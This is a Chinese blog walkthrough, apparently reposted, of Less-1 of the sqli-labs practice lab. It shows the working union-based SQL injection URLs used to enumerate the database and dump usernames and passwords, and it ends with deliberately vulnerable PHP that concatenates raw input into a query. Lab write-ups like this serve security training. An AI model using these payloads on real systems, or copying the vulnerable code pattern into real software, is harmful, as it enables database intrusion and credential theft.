首先来到第一关:
http://127.0.0.1/sqli-labs-master/Less-1/
用语句 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' 进行测试报错
可以看到sql语句出错了。
用 and 1 = 1去测试:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 1 %23 回显正常
%23是“#”注释
用 and 1 = 2 去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 2 %23 回显示失败,说明存在注入点。
判断字段:
当order by 3 的时候,回显正常:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 %23
当order by 4 的时候,回显不正常:
说明字段是3。
报错显示回显库:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 %23
回显的地方是2和3。
用version()看版本:
用database()看当前网站使用的数据库:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(), database() %23
通过下图可以看到,使用的php版本是5.5.53,该网站使用的数据库名字是security
添加?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23 使用过滤查询语句where 查看security数据库内的表
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23
看到有四个表:
查看users表内的列
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23
查看username和password里的内容:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users %23
我们在看到users表里还看到了id,我们看看有多少组账号密码
只需要在后面加上 where id = n即可
经过测试 id 最大是14
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users where id = 1%23
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users where id = 14%23
第一关结束:
第二关很快更新。
声明:官方源码被我改动了。附上我改动的php代码:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
<?php
//including the Mysql connect parameters.
include
(
"../sql-connections/sql-connect.php"
);
error_reporting
(0);
// take the variables
if
(isset(
$_GET
[
'id'
]))
{
$id
=
$_GET
[
'id'
];
//logging the connection parameters to a file for analysis.
$fp
=
fopen
(
'result.txt'
,
'a'
);
fwrite(
$fp
,
'ID:'
.
$id
.
"\n"
);
fclose(
$fp
);
// connectivity
$sql
=
"SELECT * FROM users WHERE id='$id' LIMIT 0,1"
;
$result
=mysql_query(
$sql
);
$row
= mysql_fetch_array(
$result
);
echo
$sql
;
echo
"<br>"
;
if
(
$row
)
{
echo
"<font size='5' color= '#99FF00'>"
;
echo
'Your Login name:'
.
$row
[
'username'
];
echo
"<br>"
;
echo
'Your Password:'
.
$row
[
'password'
];
echo
"</font>"
;
}
else
{
echo
'<font color= "#FFFF00">'
;
print_r(mysql_error());
echo
"</font>"
;
}
}
else
{
echo
"Please input the ID as parameter with numeric value"
;}
?>
|
微信公众号:
本文转自 天道酬勤VIP 51CTO博客,原文链接:http://blog.51cto.com/tdcqvip/2060816
